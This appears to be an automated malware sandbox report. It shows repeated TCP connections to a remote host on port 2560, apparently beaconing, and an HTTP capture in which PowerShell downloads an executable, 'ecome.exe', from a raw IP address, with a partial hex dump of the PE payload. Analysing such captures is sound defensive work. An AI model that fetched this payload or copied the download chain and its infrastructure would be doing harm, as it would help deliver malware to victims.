                                                                              Dec 16, 2024 17:33:21.924957991 CET256050055107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:21.926481009 CET500552560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:21.926575899 CET500552560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:22.046442986 CET256050055107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:22.382034063 CET500592560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:22.502218962 CET256050059107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:22.506088018 CET500592560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:22.703326941 CET500592560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:22.823216915 CET256050059107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:24.470989943 CET256050059107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:24.475070000 CET500592560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:24.475311995 CET500592560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:24.595760107 CET256050059107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:24.971535921 CET500602560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:25.091747999 CET256050060107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:25.094027996 CET500602560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:25.396944046 CET500602560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:25.519004107 CET256050060107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:27.048909903 CET256050060107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:27.049050093 CET500602560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:27.049144983 CET500602560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:27.169250965 CET256050060107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:27.475678921 CET500612560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:27.595947027 CET256050061107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:27.600079060 CET500612560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:27.807471991 CET500612560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:27.927783012 CET256050061107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:29.548742056 CET256050061107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:29.548832893 CET500612560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:29.548922062 CET500612560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:29.669183016 CET256050061107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:29.960249901 CET500622560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:30.080296993 CET256050062107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:30.080404043 CET500622560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:30.283121109 CET500622560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:30.403151989 CET256050062107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:32.017690897 CET256050062107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:32.019962072 CET500622560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:32.019963026 CET500622560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:32.139942884 CET256050062107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:32.413333893 CET500632560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:32.533194065 CET256050063107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:32.534214020 CET500632560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:32.725119114 CET500632560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:32.845110893 CET256050063107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:34.466983080 CET256050063107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:34.467071056 CET500632560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:34.467137098 CET500632560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:34.587217093 CET256050063107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:34.897727966 CET500642560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:35.017796993 CET256050064107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:35.018878937 CET500642560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:35.279050112 CET500642560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:35.399085045 CET256050064107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:36.967065096 CET256050064107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:36.968097925 CET500642560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:36.968199968 CET500642560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:37.088157892 CET256050064107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:37.345701933 CET500652560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:37.465578079 CET256050065107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:37.468046904 CET500652560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:37.710551023 CET500652560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:37.830738068 CET256050065107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:39.405567884 CET256050065107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:39.408041954 CET500652560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:39.408111095 CET500652560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:39.528264999 CET256050065107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:39.775856972 CET500662560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:39.896806002 CET256050066107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:39.898191929 CET500662560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:40.105117083 CET500662560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:40.225374937 CET256050066107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:41.842327118 CET256050066107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:41.846513033 CET500662560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:41.846594095 CET500662560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:41.966598988 CET256050066107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:42.194406033 CET500672560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:42.314538956 CET256050067107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:42.318429947 CET500672560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:42.550971031 CET500672560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:42.671120882 CET256050067107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:44.248337030 CET256050067107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:44.250391006 CET500672560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:44.250391006 CET500672560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:44.370431900 CET256050067107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:44.605273962 CET500682560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:44.725163937 CET256050068107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:44.725755930 CET500682560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:44.944195032 CET500682560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:45.065967083 CET256050068107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:46.674446106 CET256050068107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:46.675081968 CET500682560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:46.675081968 CET500682560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:46.795332909 CET256050068107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:47.006922960 CET500692560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:47.126791000 CET256050069107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:47.130249023 CET500692560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:47.367614031 CET500692560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:47.487629890 CET256050069107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:49.061661005 CET256050069107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:49.064097881 CET500692560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:49.064172029 CET500692560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:49.183939934 CET256050069107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:49.407125950 CET500702560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:49.528532028 CET256050070107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:49.528654099 CET500702560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:49.746546030 CET500702560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:49.867263079 CET256050070107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:51.486603975 CET256050070107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:51.488115072 CET500702560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:51.488184929 CET500702560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:51.607965946 CET256050070107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:51.890505075 CET500712560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:52.010776997 CET256050071107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:52.010885000 CET500712560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:52.258084059 CET500712560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:52.379559994 CET256050071107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:53.958439112 CET256050071107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:53.962240934 CET500712560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:53.962321997 CET500712560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:54.082436085 CET256050071107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:54.295347929 CET500722560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:54.415344000 CET256050072107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:54.418391943 CET500722560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:54.653616905 CET500722560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:54.774112940 CET256050072107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:56.377437115 CET256050072107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:56.377518892 CET500722560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:56.377589941 CET500722560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:56.497422934 CET256050072107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:56.831453085 CET500732560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:56.951386929 CET256050073107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:56.951482058 CET500732560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:56.955085993 CET500732560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:57.074976921 CET256050073107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:58.890146971 CET256050073107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:58.890768051 CET500732560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:58.890930891 CET500732560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:59.011030912 CET256050073107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:59.286679029 CET500742560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:59.407502890 CET256050074107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:33:59.407596111 CET500742560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:59.656265020 CET500742560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:33:59.776042938 CET256050074107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:01.357773066 CET256050074107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:01.357873917 CET500742560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:01.357991934 CET500742560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:01.478388071 CET256050074107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:01.753741026 CET500752560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:01.873661995 CET256050075107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:01.876163960 CET500752560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:02.174818039 CET500752560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:02.294918060 CET256050075107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:03.826939106 CET256050075107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:03.826994896 CET500752560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:03.827130079 CET500752560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:03.946825981 CET256050075107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:04.272372007 CET500762560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:04.393215895 CET256050076107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:04.393337011 CET500762560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:04.647898912 CET500762560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:04.768028021 CET256050076107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:06.331016064 CET256050076107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:06.331130981 CET500762560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:06.331218004 CET500762560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:06.451241970 CET256050076107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:06.689722061 CET500772560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:06.809696913 CET256050077107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:06.809905052 CET500772560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:07.040433884 CET500772560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:07.161191940 CET256050077107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:08.752547026 CET256050077107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:08.752657890 CET500772560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:08.752767086 CET500772560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:08.872594118 CET256050077107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:09.102160931 CET500782560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:09.224962950 CET256050078107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:09.225107908 CET500782560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:09.476947069 CET500782560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:09.599654913 CET256050078107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:11.163357973 CET256050078107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:11.163417101 CET500782560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:11.163609028 CET500782560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:11.284086943 CET256050078107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:11.552261114 CET500792560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:11.676034927 CET256050079107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:11.679994106 CET500792560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:11.919214010 CET500792560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:12.038929939 CET256050079107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:13.639971018 CET256050079107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:13.640104055 CET500792560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:13.640158892 CET500792560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:13.760119915 CET256050079107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:14.011995077 CET500802560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:14.132386923 CET256050080107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:14.132508039 CET500802560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:14.380361080 CET500802560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:14.500334024 CET256050080107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:16.081033945 CET256050080107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:16.084199905 CET500802560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:16.084290028 CET500802560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:16.204358101 CET256050080107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:16.447716951 CET500812560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:16.567845106 CET256050081107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:16.568259954 CET500812560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:16.776143074 CET500812560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:16.895984888 CET256050081107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:18.650593996 CET256050081107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:18.650733948 CET500812560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:18.651007891 CET500812560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:18.772953033 CET256050081107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:19.003511906 CET500822560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:19.123366117 CET256050082107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:19.123466015 CET500822560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:19.355465889 CET500822560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:19.475987911 CET256050082107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:21.062587976 CET256050082107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:21.062808990 CET500822560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:21.062865973 CET500822560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:21.183044910 CET256050082107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:21.417874098 CET500832560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:21.537672997 CET256050083107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:21.537842035 CET500832560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:21.752460957 CET500832560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:21.945466042 CET256050083107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:23.576494932 CET256050083107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:23.576702118 CET500832560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:23.576756954 CET500832560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:23.696654081 CET256050083107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:23.939965963 CET500842560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:24.059772015 CET256050084107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:24.060147047 CET500842560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:24.063752890 CET500842560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:24.185342073 CET256050084107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:26.009071112 CET256050084107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:26.009268999 CET500842560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:26.009269953 CET500842560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:26.129467964 CET256050084107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:26.421283007 CET500852560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:26.541238070 CET256050085107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:26.541500092 CET500852560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:26.755002975 CET500852560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:26.877984047 CET256050085107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:28.541759968 CET256050085107.173.4.16192.168.2.4
                                                                              Dec 16, 2024 17:34:28.541836977 CET500852560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:28.696043968 CET500852560192.168.2.4107.173.4.16
                                                                              Dec 16, 2024 17:34:28.816206932 CET256050085107.173.4.16192.168.2.4

                                                                              HTTP Request Dependency Graph

                                                                              • 192.3.179.166

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.449730192.3.179.166802568C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 16, 2024 17:30:27.786887884 CET285OUTGET /75/ecome.exe HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                              Host: 192.3.179.166
                                                                              Connection: Keep-Alive
                                                                              Dec 16, 2024 17:30:28.926110029 CET1236INHTTP/1.1 200 OK
                                                                              Date: Mon, 16 Dec 2024 16:30:28 GMT
                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                              Last-Modified: Mon, 16 Dec 2024 12:01:19 GMT
                                                                              ETag: "84000-62961f03fa810"
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 540672
                                                                              Keep-Alive: timeout=5, max=100
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-msdownload
                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a4 b1 e4 47 e0 d0 8a 14 e0 d0 8a 14 e0 d0 8a 14 fe 82 1f 14 f9 d0 8a 14 fe 82 0e 14 d2 d0 8a 14 fe 82 09 14 60 d0 8a 14 c7 16 f1 14 e3 d0 8a 14 e0 d0 8b 14 60 d0 8a 14 fe 82 00 14 e1 d0 8a 14 fe 82 1e 14 e1 d0 8a 14 fe 82 1b 14 e1 d0 8a 14 52 69 63 68 e0 d0 8a 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 61 1b d4 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 9a 07 00 00 12 01 00 00 00 00 00 52 85 00 00 00 10 00 00 00 b0 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 74 f2 08 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$G``RichPELaeR@t(ph=P88@.text `.datad@.rsrch=p>@@
                                                                              Dec 16, 2024 17:30:28.926609993 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii: (>Vj(<P`v*:
                                                                              Dec 16, 2024 17:30:28.926624060 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Dec 16, 2024 17:30:28.928529978 CET1236INData Raw: 01 02 01 02 01 02 01 02 01 02 01 02 01 10 00 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 01 01 00 00 00 00 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac
                                                                              Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklm
                                                                              Dec 16, 2024 17:30:28.928543091 CET1236INData Raw: 66 20 63 61 6c 6c 69 6e 67 20 61 6e 20 4d 53 49 4c 2d 63 6f 6d 70 69 6c 65 64 20 28 2f 63 6c 72 29 20 66 75 6e 63 74 69 6f 6e 20 66 72 6f 6d 20 61 20 6e 61 74 69 76 65 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 6f 72 20 66 72 6f 6d 20 44 6c 6c 4d 61
                                                                              Data Ascii: f calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.R6032- not enough space for locale informationR6031- Attempt to initialize the CRT more than once.This indicates a bug in your application.
                                                                              Dec 16, 2024 17:30:28.930706024 CET1236INData Raw: 00 46 6c 73 41 6c 6c 6f 63 00 00 00 00 28 00 6e 00 75 00 6c 00 6c 00 29 00 00 00 00 00 28 6e 75 6c 6c 29 00 00 06 00 00 06 00 01 00 00 10 00 03 06 00 06 02 10 04 45 45 45 05 05 05 05 05 35 30 00 50 00 00 00 00 28 20 38 50 58 07 08 00 37 30 30 57
                                                                              Data Ascii: FlsAlloc(null)(null)EEE50P( 8PX700WP `h````xpxxxx
                                                                              Dec 16, 2024 17:30:28.930726051 CET1236INData Raw: 79 6e 6f 72 73 6b 00 00 00 6e 6f 72 77 65 67 69 61 6e 2d 62 6f 6b 6d 61 6c 00 00 00 00 6e 6f 72 77 65 67 69 61 6e 00 00 00 69 74 61 6c 69 61 6e 2d 73 77 69 73 73 00 00 00 69 72 69 73 68 2d 65 6e 67 6c 69 73 68 00 00 00 67 65 72 6d 61 6e 2d 73 77
                                                                              Data Ascii: ynorsknorwegian-bokmalnorwegianitalian-swissirish-englishgerman-swissgerman-luxembourggerman-lichtensteingerman-austrianfrench-swissfrench-luxembourgfrench-canadianfrench-belgianenglish-usaenglish-usenglis
                                                                              Dec 16, 2024 17:30:28.932929039 CET1236INData Raw: 00 50 52 49 00 7c 25 40 00 53 56 4b 00 6c 25 40 00 5a 41 46 00 60 25 40 00 4b 4f 52 00 50 25 40 00 5a 41 46 00 44 25 40 00 4b 4f 52 00 30 25 40 00 54 54 4f 00 0c 26 40 00 47 42 52 00 20 25 40 00 47 42 52 00 10 25 40 00 55 53 41 00 08 26 40 00 55
                                                                              Data Ascii: PRI|%@SVKl%@ZAF`%@KORP%@ZAFD%@KOR0%@TTO&@GBR %@GBR%@USA&@USA6-0OCPACPNorwegian-NynorskGetProcessWindowStationGetUserObjectInformationAGetLastActivePopupGetActiveWindowMessageBoxAUSER32
                                                                              Dec 16, 2024 17:30:28.932941914 CET1236INData Raw: 00 60 76 65 63 74 6f 72 20 64 65 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 76 65 63 74 6f 72 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 60 73 63 61 6c 61 72 20 64 65 6c 65 74 69 6e 67 20
                                                                              Data Ascii: `vector destructor iterator'`vector constructor iterator'`scalar deleting destructor'`default constructor closure'`vector deleting destructor'`vbase destructor'`string'`local static guard'`typeof'`vcall'`vbtab
